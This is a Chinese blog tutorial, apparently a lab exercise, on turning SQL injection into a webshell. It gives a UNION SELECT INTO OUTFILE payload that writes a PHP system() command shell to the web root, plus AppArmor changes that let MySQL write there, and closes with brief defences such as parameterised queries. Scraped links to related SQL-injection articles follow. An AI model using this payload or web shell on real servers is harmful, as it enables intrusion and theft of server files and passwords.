sql注入获取webshell
寻找sql注入页面,操作数据库的地方
向网站写入sql语句
' union select 1,2, '<?php system($_GET["cmd"]);?>' into outfile '/var/www/myzoo/cmd.php'

发现mysql没有写入权限,于是在apparmor中为mysql添加权限
vi /etc/apparmor.d/usr.sbin.mysqld
在文件最后添加:/var/www/myzoo/* rw,
然后重启apache重启apparmor
重新注入

*一般来说,嗅探1,2需要采用benchmark函数,根据返回时间来判断数据库表结构
*本网站是直接暴露数据库表结构的

于是在网站根目录写入了cmd.php文件
利用此文件执行我们想要做的事情
比如:查看服务器所有文件密码或者其他的

防御sql注入获取webshell:
 
1.如果在编写SQL语句的时候,用户输入的变量不是直接嵌入到SQL语句。而是通过参数来传递这个变量的话,那么就可以有效的防治SQL注入式攻击。也就是说,用户的输入绝对不能够直接被嵌入到SQL语句中。与此相反,用户的输入的内容必须进行过滤,或者使用参数化的语句来传递用户输入的变量。

2.普通用户和系统用户权限设置

3.正则表达式验证用户输入,等等。
 
hash冲突dos网站攻击下次更新了

转载于:https://www.cnblogs.com/ailx10/p/5251739.html

web安全:sql 注入相关推荐

  1. CTFshow——web入门——sql注入

    web入门--sql注入 基础知识点 判断是否注入 order by 判断列数 使用union select 判断回显 查询数据库 web171 web172 web173 web174 web175 ...

  2. ctfshow web入门-sql注入

    ctfshow web入门-sql注入 web171 web172 web173 web174 web175 web176 web177 web178 web179 web180 web181 web ...

  3. web之SQL注入篇BUU

    web之SQL注入篇BUU [强网杯 2019]随便注 预处理语句 handler [SUCTF 2019]EasySQL 判断是字符型还是数字型注入 判断是否可以联合查询 判断是否可以使堆叠注入 | ...

  4. 《从0到1:CTFer成长之路》书籍配套题目-[第一章 web入门]SQL注入-2

    [第一章 web入门]SQL注入-2 一.信息收集 1.首页 2.登录成功会跳转到 3.进行测试判断 二.尝试破解 1.用post型的sqlmap破解 <1>.首先,开burp截包 < ...

  5. web漏洞-SQL注入漏洞、目录遍历漏洞、文件下载漏洞

    这里用到的是Pikachu漏洞练习平台 一.SQL注入漏洞-数字型注入 SQL注入漏洞简介 在owasp发布的top10排行榜里,注入漏洞一直是危害排名第一的漏洞,其中注入漏洞里面首当其冲的就是数据库 ...

  6. web测试-sql注入漏洞

    1.web程序三层结构 2.什么是sql注入 SQL注入 是将Web页面的原URL.表单域或数据包输入的参数,修改拼接成SQL语句,传递给Web服务器,进而传给数据库服务器以执行数据库命令. 注入攻击 ...

  7. 【ctfshow】web篇-SQL注入 wp

    前言 记录web的题目wp,慢慢变强,铸剑. SQL注入 web171 根据语句可以看到有flag没有被显示出来,让我们拼接语句来绕过 //拼接sql语句查找指定ID用户 $sql = "s ...

  8. Web渗透-SQL注入

    渗透测试基础 一.渗透攻击流程 二.渗透测试主流工具 域名注册信息查询: Whois在线查询目标网络信息DNS和IP,nslookup 在线漏洞搜索引擎: fofa.info,shodan.io,zo ...

  9. ctfshow web入门 sql注入

    无过滤注入 web171 查询语句 $sql = "select username,password from user where username !='flag' and id = ' ...

  10. WEB安全-SQL注入

    注意:文章仅供大家参考学习 文章目录 前言 一.SQL注入是什么? 二.造成SQL注入的原因 三.SQL注入原理 四.修复建议 五.靶场演示 六.关键分析代码 前言 注意:文章仅供大家参考 网络安全中 ...

最新文章

  1. 神童、数学家、抑郁症患者,控制论之父诺伯特·维纳的一生
  2. android 视频图片,Android - 视频提取图片方法
  3. 7.5. Zend Optimizer
  4. apache+tomcat配置
  5. verilog 浮点转定点_定点数和浮点数
  6. java中方法_java中的方法
  7. python web改为java_Python是否可以成为Web应用程序的良好替代方案,否则将在Java EE中完成?...
  8. SQL server 2008配置与用户名登录
  9. php三元运算符应用举例,php – 使用嵌套三元运算符
  10. 用java操作MySQL编写的高校水电费管理系统
  11. @Deprecated 的功能
  12. HomeKit 开发指南(中文版)
  13. everything搜索指定路径下的多个文件
  14. 将list对象存储进redis中去
  15. OpenCV-Python身份证信息识别
  16. odoo12 学习: 无效视图 xxxx xxxx xxxx 定义 False
  17. 2020年中国地理信息产业现状分析,发展前景广阔「图」
  18. hadoop权威指南第三版 发布说明
  19. Exception in thread “main“ java.lang.NoClassDefFoundError: org/apache/velocity/context/Contex
  20. 利息计算的方式及实现

热门文章

  1. 杭电acm1000c语言答案,c语言,杭电acm1328这题怎么做啊,求提示!!!
  2. Scala学习01——Scala介绍
  3. chatroom.php,chatRoom.php
  4. c语言打字游戏程序设计报告,2016打字游戏程序设计报告.doc
  5. redis-hmap --go
  6. 国外计算机应用基础,计算机应用基础试题(国外英文资料).doc
  7. aliy 数据库连接池加密_Druid数据库连接池 实现数据库账号密码加密
  8. php文件怎么加统计代码,php统计文件中的代码行数
  9. 使用锚标记返回网页顶部的方法
  10. 利用端口映射解决:拥有公网IP有限,内网需要访问因特网